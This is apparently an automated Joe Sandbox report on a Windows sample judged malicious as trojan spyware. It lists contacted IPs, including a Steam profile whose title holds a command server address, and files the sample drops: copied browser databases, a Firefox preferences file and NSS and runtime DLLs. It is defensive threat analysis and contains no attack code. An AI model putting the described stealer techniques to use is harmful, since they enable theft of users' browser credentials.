                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    23.194.234.100
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    95.217.240.101
                    		unknownGermany
                    		24940HETZNER-ASDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1442218
                    Start date and time:2024-05-15 20:35:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 29s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@11/25@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    20:35:57API Interceptor1x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\GHIJJEGDBFII\AEHDAK

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):126976
                    Entropy (8bit):0.47147045728725767
                    Encrypted:false
                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\CBFIJE

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\CBFIJE-shm

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\CFHCGH

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\GCBFBG

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.037963276276857943
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                    Malicious:false
                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\GCBFBG-shm

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\GDAAKF

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                    Category:dropped
                    Size (bytes):159744
                    Entropy (8bit):0.7873599747470391
                    Encrypted:false
                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                    Malicious:false
                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\GHIJJE

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\HDAFII

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                    Category:dropped
                    Size (bytes):28672
                    Entropy (8bit):2.5793180405395284
                    Encrypted:false
                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\IIDHJD

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                    Category:dropped
                    Size (bytes):9571
                    Entropy (8bit):5.536643647658967
                    Encrypted:false
                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                    Malicious:false
                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                    C:\ProgramData\GHIJJEGDBFII\JEGHDA

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\freebl3.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\mozglue.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\msvcp140.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\nss3.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\softokn3.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):35643
                    Entropy (8bit):5.382912586977827
                    Encrypted:false
                    SSDEEP:768:s7pqLtWYmwt5D0gqVUiNGAZPzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SC:s78LtWYmwt5D0gqVUcZPzzgiJmDzJtxW
                    MD5:7BCE059CFD60B798CB45C3F4C80B9F6C
                    SHA1:736FAB76D920E9A5E4BAB9E12E8C85C9D4B22A06
                    SHA-256:317AB49AEA660F5D325951C5EF280A54F6192D3B31A15B0F985EA292ED159980
                    SHA-512:B0875CD2B58367D1165D373600CE208B63C4E435A62C237729BB66645A43FC5A6DF16CC646553F97700FA5A7E4C3A5EEE4C7591D7A29E8F87662B815E8A56756
                    Malicious:false
                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2459136
                    Entropy (8bit):6.052474106868353
                    Encrypted:false
                    SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                    MD5:90E744829865D57082A7F452EDC90DE5
                    SHA1:833B178775F39675FA4E55EAB1032353514E1052
                    SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                    SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
